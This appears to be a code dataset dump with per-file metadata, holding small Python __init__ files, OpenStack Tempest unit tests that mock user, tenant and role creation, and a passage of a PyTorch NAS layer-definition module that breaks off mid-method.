2022-03-29T20:47:39.000Z
|
l10n_br_automated_payment/wizard/__init__.py
|
kaoecoito/odoo-brasil
|
6e019efc4e03b2e7be6ca51d08ace095240e0f07
|
[
"MIT"
] | 227
|
2016-11-10T17:16:59.000Z
|
2022-03-26T16:46:38.000Z
|
from . import wizard_iugu
from . import wizard_new_payment
| 19.666667
| 32
| 0.830508
| 9
| 59
| 5.111111
| 0.666667
| 0.434783
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135593
| 59
| 3
| 32
| 19.666667
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
da5fa75dbde247a9cd6263b9d50bb2346ec3f2ee
| 183
|
py
|
Python
|
luupsmap/model/__init__.py
|
Team-LANS/luups-map
|
f9d5dddee86d9141dd6e2ae071c8e6fa37f376f2
|
[
"MIT"
] | 1
|
2019-07-30T17:13:41.000Z
|
2019-07-30T17:13:41.000Z
|
luupsmap/model/__init__.py
|
Team-LANS/luups-map
|
f9d5dddee86d9141dd6e2ae071c8e6fa37f376f2
|
[
"MIT"
] | 15
|
2019-02-09T13:27:18.000Z
|
2019-04-01T21:18:52.000Z
|
luupsmap/model/__init__.py
|
Team-LANS/luups-map
|
f9d5dddee86d9141dd6e2ae071c8e6fa37f376f2
|
[
"MIT"
] | null | null | null |
from luupsmap.model.enums import *
from luupsmap.model.location import *
from luupsmap.model.voucher import *
from luupsmap.model.venue import *
from luupsmap.model.interval import *
| 30.5
| 37
| 0.808743
| 25
| 183
| 5.92
| 0.36
| 0.405405
| 0.574324
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10929
| 183
| 5
| 38
| 36.6
| 0.907975
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
da61fe523a2a1e43762399a146481907e7e49e43
| 16,942
|
py
|
Python
|
config_tempest/tests/test_config_tempest_user.py
|
mail2nsrajesh/python-tempestconf
|
ab53cc8638f51283bbef183a01113478e362434f
|
[
"Apache-2.0"
] | null | null | null |
config_tempest/tests/test_config_tempest_user.py
|
mail2nsrajesh/python-tempestconf
|
ab53cc8638f51283bbef183a01113478e362434f
|
[
"Apache-2.0"
] | null | null | null |
config_tempest/tests/test_config_tempest_user.py
|
mail2nsrajesh/python-tempestconf
|
ab53cc8638f51283bbef183a01113478e362434f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from config_tempest import config_tempest as tool
from config_tempest.tests.base import BaseConfigTempestTest
import mock
from tempest.lib import exceptions
class TestCreateTempestUser(BaseConfigTempestTest):
def setUp(self):
super(TestCreateTempestUser, self).setUp()
self.conf = self._get_conf("v2.0", "v3")
self.tenants_client = self._get_clients(self.conf).tenants
self.users_client = self._get_clients(self.conf).users
self.roles_client = self._get_clients(self.conf).roles
@mock.patch('config_tempest.config_tempest.'
'create_user_with_tenant')
@mock.patch('config_tempest.config_tempest.give_role_to_user')
def _test_create_tempest_user(self,
mock_give_role_to_user,
mock_create_user_with_tenant,
services):
alt_username = "my_user"
alt_password = "my_pass"
alt_tenant_name = "my_tenant"
self.conf.set("identity", "alt_username", alt_username)
self.conf.set("identity", "alt_password", alt_password)
self.conf.set("identity", "alt_tenant_name", alt_tenant_name)
tool.create_tempest_users(self.tenants_client,
self.roles_client,
self.users_client,
self.conf,
services=services)
if 'orchestration' in services:
self.assertEqual(mock_give_role_to_user.mock_calls, [
mock.call(self.tenants_client,
self.roles_client,
self.users_client,
self.conf.get('identity',
'admin_username'),
self.conf.get('identity',
'tenant_name'),
role_name='admin'),
mock.call(self.tenants_client,
self.roles_client,
self.users_client,
self.conf.get('identity',
'username'),
self.conf.get('identity',
'tenant_name'),
role_name='heat_stack_owner',
role_required=False),
])
else:
mock_give_role_to_user.assert_called_with(
self.tenants_client, self.roles_client,
self.users_client,
self.conf.get('identity', 'admin_username'),
self.conf.get('identity', 'tenant_name'),
role_name='admin')
self.assertEqual(mock_create_user_with_tenant.mock_calls, [
mock.call(self.tenants_client,
self.users_client,
self.conf.get('identity', 'username'),
self.conf.get('identity', 'password'),
self.conf.get('identity', 'tenant_name')),
mock.call(self.tenants_client,
self.users_client,
self.conf.get('identity', 'alt_username'),
self.conf.get('identity', 'alt_password'),
self.conf.get('identity', 'alt_tenant_name')),
])
def test_create_tempest_user(self):
services = ['compute', 'network']
self._test_create_tempest_user(services=services)
def test_create_tempest_user_with_orchestration(self):
services = ['compute', 'network', 'orchestration']
self._test_create_tempest_user(services=services)
class TestCreateUserWithTenant(BaseConfigTempestTest):
def setUp(self):
super(TestCreateUserWithTenant, self).setUp()
self.conf = self._get_conf("v2.0", "v3")
self.tenants_client = self._get_clients(self.conf).tenants
self.users_client = self._get_clients(self.conf).users
self.username = "test_user"
self.password = "cryptic"
self.tenant_name = "project"
self.tenant_description = "Tenant for Tempest %s user" % self.username
self.email = "%s@test.com" % self.username
@mock.patch('tempest.common.identity.get_tenant_by_name')
@mock.patch('tempest.lib.services.identity.v2.tenants_client.'
'TenantsClient.create_tenant')
@mock.patch('tempest.lib.services.identity.v2.users_client.'
'UsersClient.create_user')
def test_create_user_with_tenant(self,
mock_create_user,
mock_create_tenant,
mock_get_tenant_by_name):
mock_get_tenant_by_name.return_value = {'id': "fake-id"}
tool.create_user_with_tenant(
tenants_client=self.tenants_client,
users_client=self.users_client,
username=self.username,
password=self.password,
tenant_name=self.tenant_name)
mock_create_tenant.assert_called_with(
name=self.tenant_name, description=self.tenant_description)
mock_create_user.assert_called_with(name=self.username,
password=self.password,
tenantId="fake-id",
email=self.email)
@mock.patch('tempest.common.identity.get_tenant_by_name')
@mock.patch(
'tempest.lib.services.identity.v2.'
'tenants_client.TenantsClient.create_tenant')
@mock.patch('tempest.lib.services.identity.v2'
'.users_client.UsersClient.create_user')
def test_create_user_with_tenant_tenant_exists(
self,
mock_create_user,
mock_create_tenant,
mock_get_tenant_by_name):
mock_get_tenant_by_name.return_value = {'id': "fake-id"}
exc = exceptions.Conflict
mock_create_tenant.side_effect = exc
tool.create_user_with_tenant(
tenants_client=self.tenants_client,
users_client=self.users_client,
username=self.username,
password=self.password,
tenant_name=self.tenant_name)
mock_create_tenant.assert_called_with(
name=self.tenant_name, description=self.tenant_description)
mock_create_user.assert_called_with(
name=self.username,
password=self.password,
tenantId="fake-id",
email=self.email)
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.update_user_password')
@mock.patch('tempest.common.identity.get_user_by_username')
@mock.patch('tempest.common.identity.get_tenant_by_name')
@mock.patch('tempest.lib.services.identity.v2.'
'tenants_client.TenantsClient.create_tenant')
@mock.patch('tempest.lib.services.identity.'
'v2.users_client.UsersClient.create_user')
def test_create_user_with_tenant_user_exists(
self, mock_create_user, mock_create_tenant,
mock_get_tenant_by_name,
mock_get_user_by_username,
mock_update_user_password):
mock_get_tenant_by_name.return_value = {'id': "fake-id"}
exc = exceptions.Conflict
mock_create_user.side_effect = exc
fake_user = {'id': "fake_user_id"}
mock_get_user_by_username.return_value = fake_user
tool.create_user_with_tenant(
tenants_client=self.tenants_client,
users_client=self.users_client,
username=self.username, password=self.password,
tenant_name=self.tenant_name)
mock_create_tenant.assert_called_with(
name=self.tenant_name, description=self.tenant_description)
mock_create_user.assert_called_with(name=self.username,
password=self.password,
tenantId="fake-id",
email=self.email)
mock_update_user_password.assert_called_with(
fake_user['id'], password=self.password)
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.update_user_password')
@mock.patch('tempest.common.identity.get_user_by_username')
@mock.patch('tempest.common.identity.get_tenant_by_name')
@mock.patch('tempest.lib.services.identity.v2.'
'tenants_client.TenantsClient.create_tenant')
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.create_user')
def test_create_user_with_tenant_exists_user_exists(
self, mock_create_user, mock_create_tenant,
mock_get_tenant_by_name,
mock_get_user_by_username,
mock_update_user_password):
mock_get_tenant_by_name.return_value = {'id': "fake-id"}
exc = exceptions.Conflict
mock_create_tenant.side_effects = exc
mock_create_user.side_effect = exc
fake_user = {'id': "fake_user_id"}
mock_get_user_by_username.return_value = fake_user
tool.create_user_with_tenant(tenants_client=self.tenants_client,
users_client=self.users_client,
username=self.username,
password=self.password,
tenant_name=self.tenant_name)
mock_create_tenant.assert_called_with(
name=self.tenant_name, description=self.tenant_description)
mock_create_user.assert_called_with(name=self.username,
password=self.password,
tenantId="fake-id",
email=self.email)
mock_update_user_password.assert_called_with(
fake_user['id'], password=self.password)
class TestGiveRoleToUser(BaseConfigTempestTest):
def setUp(self):
super(TestGiveRoleToUser, self).setUp()
self.conf = self._get_conf("v2.0", "v3")
self.tenants_client = self._get_clients(self.conf).tenants
self.users_client = self._get_clients(self.conf).users
self.roles_client = self._get_clients(self.conf).roles
self.username = "test_user"
self.tenant_name = "project"
self.role_name = "fake_role"
self.users = {'users':
[{'name': "test_user",
'id': "fake_user_id"},
{'name': "test_user2",
'id': "fake_user_id2"}]}
self.roles = {'roles':
[{'name': "fake_role",
'id': "fake_role_id"},
{'name': "fake_role2",
'id': "fake_role_id2"}]}
@mock.patch('tempest.common.identity.get_tenant_by_name')
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.list_users')
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.create_user')
@mock.patch('tempest.lib.services.identity.v2.'
'roles_client.RolesClient.list_roles')
@mock.patch('tempest.lib.services.identity.v2.''roles_client.'
'RolesClient.create_user_role_on_project')
def test_give_role_to_user(self,
mock_create_user_role_on_project,
mock_list_roles,
mock_create_user,
mock_list_users,
mock_get_tenant_by_name):
mock_get_tenant_by_name.return_value = \
{'id': "fake_tenant_id"}
mock_list_users.return_value = self.users
mock_list_roles.return_value = self.roles
tool.give_role_to_user(
tenants_client=self.tenants_client,
roles_client=self.roles_client,
users_client=self.users_client,
username=self.username,
tenant_name=self.tenant_name,
role_name=self.role_name)
mock_create_user_role_on_project.assert_called_with(
"fake_tenant_id", "fake_user_id", "fake_role_id")
@mock.patch('tempest.common.identity.get_tenant_by_name')
@mock.patch('tempest.lib.services.identity.'
'v2.users_client.UsersClient.list_users')
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.create_user')
@mock.patch('tempest.lib.services.identity.v2.'
'roles_client.RolesClient.list_roles')
@mock.patch('tempest.lib.services.identity.v2.'
'roles_client.RolesClient.create_user_role_on_project')
def test_give_role_to_user_role_not_found(
self,
mock_create_user_role_on_project,
mock_list_roles,
mock_create_user,
mock_list_users,
mock_get_tenant_by_name):
role_name = "fake_role_that_does_not_exist"
mock_get_tenant_by_name.return_value = \
{'id': "fake_tenant_id"}
mock_list_users.return_value = self.users
mock_list_roles.return_value = self.roles
exc = Exception
self.assertRaises(exc,
tool.give_role_to_user,
tenants_client=self.tenants_client,
roles_client=self.roles_client,
users_client=self.users_client,
username=self.username,
tenant_name=self.tenant_name,
role_name=role_name)
@mock.patch('tempest.common.identity.get_tenant_by_name')
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.list_users')
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.create_user')
@mock.patch('tempest.lib.services.identity.v2.'
'roles_client.RolesClient.list_roles')
@mock.patch('tempest.lib.services.identity.v2.roles_client'
'.RolesClient.create_user_role_on_project')
def test_give_role_to_user_role_not_found_not_req(
self,
mock_create_user_role_on_project,
mock_list_roles,
mock_create_user,
mock_list_users,
mock_get_tenant_by_name):
mock_get_tenant_by_name.return_value = \
{'id': "fake_tenant_id"}
mock_list_users.return_value = self.users
mock_list_roles.return_value = self.roles
tool.give_role_to_user(
tenants_client=self.tenants_client,
roles_client=self.roles_client,
users_client=self.users_client,
username=self.username,
tenant_name=self.tenant_name,
role_name=self.role_name,
role_required=False)
@mock.patch('tempest.common.identity.get_tenant_by_name')
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.list_users')
@mock.patch('tempest.lib.services.identity.v2.'
'users_client.UsersClient.create_user')
@mock.patch('tempest.lib.services.identity.v2.'
'roles_client.RolesClient.list_roles')
@mock.patch('tempest.lib.services.identity.v2.roles_client.'
'RolesClient.create_user_role_on_project')
def test_give_role_to_user_role_already_given(
self,
mock_create_user_role_on_project,
mock_list_roles,
mock_create_user,
mock_list_users,
mock_get_tenant_by_name):
exc = exceptions.Conflict
mock_create_user_role_on_project.side_effect = exc
mock_get_tenant_by_name.return_value = {'id': "fake_tenant_id"}
mock_list_users.return_value = self.users
mock_list_roles.return_value = self.roles
tool.give_role_to_user(
tenants_client=self.tenants_client,
roles_client=self.roles_client,
users_client=self.users_client,
username=self.username,
tenant_name=self.tenant_name,
role_name=self.role_name)
| 45.665768
| 78
| 0.603471
| 1,880
| 16,942
| 5.079255
| 0.087234
| 0.046078
| 0.06032
| 0.051733
| 0.840507
| 0.79202
| 0.763745
| 0.755158
| 0.753273
| 0.751388
| 0
| 0.004075
| 0.304687
| 16,942
| 370
| 79
| 45.789189
| 0.806537
| 0.035061
| 0
| 0.685801
| 0
| 0
| 0.199914
| 0.14891
| 0
| 0
| 0
| 0
| 0.045317
| 1
| 0.042296
| false
| 0.063444
| 0.012085
| 0
| 0.063444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
da8e649188e593bf4ffeec20d7be755b1ffb5894
| 57,065
|
py
|
Python
|
src/zen_nas/PlainNet/basic_blocks.py
|
Adlik/zen_nas
|
d820d5c7d5bbb6fd66a76d5f16513647d6ea7a57
|
[
"Apache-2.0"
] | 7
|
2021-10-30T07:37:45.000Z
|
2022-03-28T08:31:15.000Z
|
src/zen_nas/PlainNet/basic_blocks.py
|
Adlik/zen_nas
|
d820d5c7d5bbb6fd66a76d5f16513647d6ea7a57
|
[
"Apache-2.0"
] | 3
|
2021-11-08T06:23:12.000Z
|
2022-01-07T09:10:57.000Z
|
src/zen_nas/PlainNet/basic_blocks.py
|
Adlik/zen_nas
|
d820d5c7d5bbb6fd66a76d5f16513647d6ea7a57
|
[
"Apache-2.0"
] | 1
|
2022-01-06T01:40:18.000Z
|
2022-01-06T01:40:18.000Z
|
'''
Copyright (C) 2010-2021 Alibaba Group Holding Limited.
define all needed basic layer class
'''
# pylint: disable=W0613,too-many-lines,too-many-arguments
import os
import sys
import uuid
import torch
from torch import nn
import torch.nn.functional as F
import numpy as np
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
try:
from PlainNet import _get_right_parentheses_index_, _create_netblock_list_from_str_
except ImportError:
print('fail to import zen_nas modules')
# pylint: disable=no-self-use,invalid-name
class PlainNetBasicBlockClass(nn.Module):
"""BasicBlock base class"""
def __init__(self, in_channels=None, out_channels=None, stride=1, no_create=False, block_name=None, **kwargs):
super().__init__(**kwargs)
self.in_channels = in_channels
self.out_channels = out_channels
self.stride = stride
self.no_create = no_create
self.block_name = block_name
if self.block_name is None:
self.block_name = f'uuid{uuid.uuid4().hex}'
def forward(self, input_):
"""subclass implementation"""
raise RuntimeError('Not implemented')
def __str__(self):
return type(self).__name__ + f'({self.in_channels},{self.out_channels},{self.stride})'
def __repr__(self):
return type(self).__name__ + f'({self.block_name}|{self.in_channels},{self.out_channels},{self.stride})'
def get_output_resolution(self, input_resolution):
"""subclass implementation"""
raise RuntimeError('Not implemented')
def get_FLOPs(self, input_resolution):
"""subclass implementation"""
raise RuntimeError('Not implemented')
def get_model_size(self):
"""subclass implementation"""
raise RuntimeError('Not implemented')
def set_in_channels(self, channels):
"""subclass implementation"""
raise RuntimeError('Not implemented')
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
""" class method
:param s (str): basicblock str
:return cls instance
"""
assert PlainNetBasicBlockClass.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len(cls.__name__ + '('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
param_str_split = param_str.split(',')
in_channels = int(param_str_split[0])
out_channels = int(param_str_split[1])
stride = int(param_str_split[2])
return cls(in_channels=in_channels, out_channels=out_channels, stride=stride,
block_name=tmp_block_name, no_create=no_create), struct_str[idx + 1:]
@classmethod
def is_instance_from_str(cls, struct_str):
if struct_str.startswith(cls.__name__ + '(') and struct_str[-1] == ')':
return True
return False
class AdaptiveAvgPool(PlainNetBasicBlockClass):
"""Adaptive average pool layer"""
def __init__(self, out_channels, output_size, no_create=False, **kwargs):
super().__init__(**kwargs)
self.in_channels = out_channels
self.out_channels = out_channels
self.output_size = output_size
self.no_create = no_create
if not no_create:
self.netblock = nn.AdaptiveAvgPool2d(output_size=(self.output_size, self.output_size))
def forward(self, input_):
return self.netblock(input_)
def __str__(self):
return type(self).__name__ + f'({self.out_channels // self.output_size**2},{self.output_size})'
def __repr__(self):
return type(self).__name__ + f'({self.block_name}|{self.out_channels // self.output_size ** 2},\
{self.output_size})'
def get_output_resolution(self, input_resolution):
return self.output_size
def get_FLOPs(self, input_resolution):
return 0
def get_model_size(self):
return 0
def set_in_channels(self, channels):
self.in_channels = channels
self.out_channels = channels
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert AdaptiveAvgPool.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('AdaptiveAvgPool('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
param_str_split = param_str.split(',')
out_channels = int(param_str_split[0])
output_size = int(param_str_split[1])
return AdaptiveAvgPool(out_channels=out_channels, output_size=output_size,
block_name=tmp_block_name, no_create=no_create), struct_str[idx + 1:]
class BN(PlainNetBasicBlockClass):
def __init__(self, out_channels=None, copy_from=None, no_create=False, **kwargs):
super().__init__(**kwargs)
self.no_create = no_create
if copy_from is not None:
assert isinstance(copy_from, nn.BatchNorm2d)
self.in_channels = copy_from.weight.shape[0]
self.out_channels = copy_from.weight.shape[0]
assert out_channels is None or out_channels == self.out_channels
self.netblock = copy_from
else:
self.in_channels = out_channels
self.out_channels = out_channels
if no_create:
return
self.netblock = nn.BatchNorm2d(num_features=self.out_channels)
def forward(self, input_):
return self.netblock(input_)
def __str__(self):
return f'BN({self.out_channels})'
def __repr__(self):
return f'BN({self.block_name}|{self.out_channels})'
def get_output_resolution(self, input_resolution):
return input_resolution
def get_FLOPs(self, input_resolution):
return input_resolution ** 2 * self.out_channels
def get_model_size(self):
return self.out_channels
def set_in_channels(self, channels):
self.in_channels = channels
self.out_channels = channels
if not self.no_create:
self.netblock = nn.BatchNorm2d(num_features=self.out_channels)
self.netblock.train()
self.netblock.requires_grad_(True)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert BN.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('BN('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
out_channels = int(param_str)
return BN(out_channels=out_channels, block_name=tmp_block_name, no_create=no_create), struct_str[idx + 1:]
# pylint: disable=too-many-instance-attributes
class ConvKX(PlainNetBasicBlockClass):
"""convolutional layer"""
def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, groups=1, copy_from=None,
no_create=False, **kwargs):
super().__init__(**kwargs)
self.no_create = no_create
if copy_from is not None:
assert isinstance(copy_from, nn.Conv2d)
self.in_channels = copy_from.in_channels
self.out_channels = copy_from.out_channels
self.kernel_size = copy_from.kernel_size[0]
self.stride = copy_from.stride[0]
self.groups = copy_from.groups
assert in_channels is None or in_channels == self.in_channels
assert out_channels is None or out_channels == self.out_channels
assert kernel_size is None or kernel_size == self.kernel_size
assert stride is None or stride == self.stride
self.netblock = copy_from
else:
self.in_channels = in_channels
self.out_channels = out_channels
self.stride = stride
self.groups = groups
self.kernel_size = kernel_size
self.padding = (self.kernel_size - 1) // 2
if no_create or self.in_channels == 0 or self.out_channels == 0 or \
self.kernel_size == 0 or self.stride == 0:
return
self.netblock = nn.Conv2d(in_channels=self.in_channels, out_channels=self.out_channels,
kernel_size=self.kernel_size, stride=self.stride,
padding=self.padding, bias=False, groups=self.groups)
def forward(self, input_):
return self.netblock(input_)
def __str__(self):
return type(self).__name__ + f'({self.in_channels},{self.out_channels},{self.kernel_size},\
{self.stride})'
def __repr__(self):
return type(self).__name__ + f'({self.block_name}|{self.in_channels},{self.out_channels},\
{self.kernel_size},{self.stride})'
def get_output_resolution(self, input_resolution):
return input_resolution // self.stride
def get_FLOPs(self, input_resolution):
return self.in_channels * self.out_channels * self.kernel_size ** 2 * \
input_resolution ** 2 // self.stride ** 2 // self.groups
def get_model_size(self):
return self.in_channels * self.out_channels * self.kernel_size ** 2 // self.groups
def set_in_channels(self, channels):
self.in_channels = channels
if not self.no_create:
self.netblock = nn.Conv2d(in_channels=self.in_channels, out_channels=self.out_channels,
kernel_size=self.kernel_size, stride=self.stride,
padding=self.padding, bias=False)
self.netblock.train()
self.netblock.requires_grad_(True)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert cls.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len(cls.__name__ + '('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
split_str = param_str.split(',')
in_channels = int(split_str[0])
out_channels = int(split_str[1])
kernel_size = int(split_str[2])
stride = int(split_str[3])
return cls(in_channels=in_channels, out_channels=out_channels,
kernel_size=kernel_size, stride=stride, no_create=no_create,
block_name=tmp_block_name), struct_str[idx + 1:]
class ConvDW(PlainNetBasicBlockClass):
"""depthwise convolutional layer"""
def __init__(self, out_channels=None, kernel_size=None, stride=None, copy_from=None,
no_create=False, **kwargs):
super().__init__(**kwargs)
self.no_create = no_create
if copy_from is not None:
assert isinstance(copy_from, nn.Conv2d)
self.in_channels = copy_from.in_channels
self.out_channels = copy_from.out_channels
self.kernel_size = copy_from.kernel_size[0]
self.stride = copy_from.stride[0]
assert self.in_channels == self.out_channels
assert out_channels is None or out_channels == self.out_channels
assert kernel_size is None or kernel_size == self.kernel_size
assert stride is None or stride == self.stride
self.netblock = copy_from
else:
self.in_channels = out_channels
self.out_channels = out_channels
self.stride = stride
self.kernel_size = kernel_size
self.padding = (self.kernel_size - 1) // 2
if no_create or self.in_channels == 0 or self.out_channels == 0 or self.kernel_size == 0 \
or self.stride == 0:
return
self.netblock = nn.Conv2d(in_channels=self.in_channels, out_channels=self.out_channels,
kernel_size=self.kernel_size, stride=self.stride,
padding=self.padding, bias=False, groups=self.in_channels)
def forward(self, input_):
return self.netblock(input_)
def __str__(self):
return f'ConvDW({self.out_channels},{self.kernel_size},{self.stride})'
def __repr__(self):
return f'ConvDW({self.block_name}|{self.out_channels},{self.kernel_size},{self.stride})'
def get_output_resolution(self, input_resolution):
return input_resolution // self.stride
def get_FLOPs(self, input_resolution):
return self.out_channels * self.kernel_size ** 2 * input_resolution ** 2 // self.stride ** 2
def get_model_size(self):
return self.out_channels * self.kernel_size ** 2
def set_in_channels(self, channels):
self.in_channels = channels
self.out_channels = self.in_channels
if not self.no_create:
self.netblock = nn.Conv2d(in_channels=self.in_channels, out_channels=self.out_channels,
kernel_size=self.kernel_size, stride=self.stride,
padding=self.padding, bias=False, groups=self.in_channels)
self.netblock.train()
self.netblock.requires_grad_(True)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert ConvDW.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('ConvDW('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
split_str = param_str.split(',')
out_channels = int(split_str[0])
kernel_size = int(split_str[1])
stride = int(split_str[2])
return ConvDW(out_channels=out_channels,
kernel_size=kernel_size, stride=stride, no_create=no_create,
block_name=tmp_block_name), struct_str[idx + 1:]
class ConvKXG2(ConvKX):
"""convolution group 2"""
def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
no_create=False, **kwargs):
super().__init__(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size,
stride=stride, copy_from=copy_from, no_create=no_create,
groups=2, **kwargs)
class ConvKXG4(ConvKX):
"""convolution group 4"""
def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
no_create=False, **kwargs):
super().__init__(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size,
stride=stride, copy_from=copy_from, no_create=no_create,
groups=4, **kwargs)
class ConvKXG8(ConvKX):
"""convolution group 8"""
def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
no_create=False, **kwargs):
super().__init__(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size,
stride=stride, copy_from=copy_from, no_create=no_create,
groups=8, **kwargs)
class ConvKXG16(ConvKX):
"""convolution group 16"""
def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
no_create=False, **kwargs):
super().__init__(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size,
stride=stride, copy_from=copy_from, no_create=no_create,
groups=16, **kwargs)
class ConvKXG32(ConvKX):
"""convolution group 32"""
def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
no_create=False, **kwargs):
super().__init__(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size,
stride=stride, copy_from=copy_from, no_create=no_create,
groups=32, **kwargs)
class Flatten(PlainNetBasicBlockClass):
"""flatten layer"""
def __init__(self, out_channels, no_create=False, **kwargs):
super().__init__(**kwargs)
self.in_channels = out_channels
self.out_channels = out_channels
self.no_create = no_create
def forward(self, input_):
return torch.flatten(input_, 1)
def __str__(self):
return f'Flatten({self.out_channels})'
def __repr__(self):
return f'Flatten({self.block_name}|{self.out_channels})'
def get_output_resolution(self, input_resolution):
return 1
def get_FLOPs(self, input_resolution):
return 0
def get_model_size(self):
return 0
def set_in_channels(self, channels):
self.in_channels = channels
self.out_channels = channels
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert Flatten.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('Flatten('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
out_channels = int(param_str)
return Flatten(out_channels=out_channels, no_create=no_create, block_name=tmp_block_name), struct_str[idx + 1:]
class Linear(PlainNetBasicBlockClass):
"""Linear layer"""
def __init__(self, in_channels=None, out_channels=None, bias=True, copy_from=None,
no_create=False, **kwargs):
super().__init__(**kwargs)
self.no_create = no_create
if copy_from is not None:
assert isinstance(copy_from, nn.Linear)
self.in_channels = copy_from.weight.shape[1]
self.out_channels = copy_from.weight.shape[0]
self.use_bias = copy_from.bias is not None
assert in_channels is None or in_channels == self.in_channels
assert out_channels is None or out_channels == self.out_channels
self.netblock = copy_from
else:
self.in_channels = in_channels
self.out_channels = out_channels
self.use_bias = bias
if not no_create:
self.netblock = nn.Linear(self.in_channels, self.out_channels,
bias=self.use_bias)
def forward(self, input_):
return self.netblock(input_)
def __str__(self):
return f'Linear({self.in_channels},{self.out_channels},{int(self.use_bias)})'
def __repr__(self):
return f'Linear({self.block_name}|{self.in_channels},{self.out_channels},{int(self.use_bias)})'
def get_output_resolution(self, input_resolution):
assert input_resolution == 1
return 1
def get_FLOPs(self, input_resolution):
